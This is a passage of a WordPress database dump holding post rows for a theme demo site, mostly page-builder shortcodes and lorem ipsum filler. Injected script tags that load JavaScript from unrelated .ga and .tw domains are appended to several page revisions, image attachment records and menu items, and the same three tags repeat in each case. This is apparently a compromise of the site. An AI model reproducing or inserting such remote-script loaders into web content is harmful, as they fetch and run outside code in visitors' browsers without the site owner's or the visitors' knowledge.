column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"6%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" bottom_padding=\"15\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6><span style=\"color: #1e83ec;\">Careers</span></h6>\r\n<h2>Want to work for us?</h2>\r\nWe\'re currently in look of a few new designers - If you\'re a passionate worker and think you have what it takes, send your resume and details to <a href=\"#\">jobs@demo.com</a> for all opportunities.[/vc_column_text][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</h2>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact','','inherit','closed','closed','','25-revision-v1','','','2018-01-11 05:09:58','2018-01-11 05:09:58','',25,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/25-revision-v1/',0,'revision','',0),(6660,1,'2018-01-18 00:17:24','2018-01-18 00:17:24','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','ban','','inherit','open','closed','','ban','','','2018-01-18 00:17:24','2018-01-18 00:17:24','',0,'https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/ban.jpg',0,'attachment','image/jpeg',0),(6661,1,'2018-01-18 00:17:35','2018-01-18 00:17:35','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','logo-dab','','inherit','open','closed','','logo-dab','','','2018-01-18 00:17:35','2018-01-18 00:17:35','',0,'https://sandbox.futuremediatrix.com/dabinter/wp-content/uploads/2018/01/logo-dab.png',0,'attachment','image/png',0),(6663,1,'2018-01-18 00:19:11','2018-01-18 00:19:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6663','','','2018-01-18 00:19:11','2018-01-18 00:19:11','',0,'https://sandbox.futuremediatrix.com/dabinter/?p=6663',1,'nav_menu_item','',0),(6664,1,'2018-01-18 00:19:11','2018-01-18 00:19:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6664','','','2018-01-18 00:19:11','2018-01-18 00:19:11','',0,'https://sandbox.futuremediatrix.com/dabinter/?p=6664',2,'nav_menu_item','',0),(6665,1,'2018-01-18 00:19:11','2018-01-18 00:19:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6665','','','2018-01-18 00:19:11','2018-01-18 00:19:11','',0,'https://sandbox.futuremediatrix.com/dabinter/?p=6665',3,'nav_menu_item','',0),(6666,1,'2018-01-18 00:20:45','2018-01-18 00:20:45','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#a0a0a0\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-18 00:20:45','2018-01-18 00:20:45','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6667,1,'2018-01-18 00:21:50','2018-01-18 00:21:50','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Us</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Our Commitment\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]\r\n<h2>Lipsum Dolor</h2>\r\n[/split_line_heading][vc_custom_heading text=\"Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1516234892568{padding-right: 10% !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\">Our Philosophy</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.\r\n\r\nVivamus vitae enim ultrices, fermentum nunc eu, 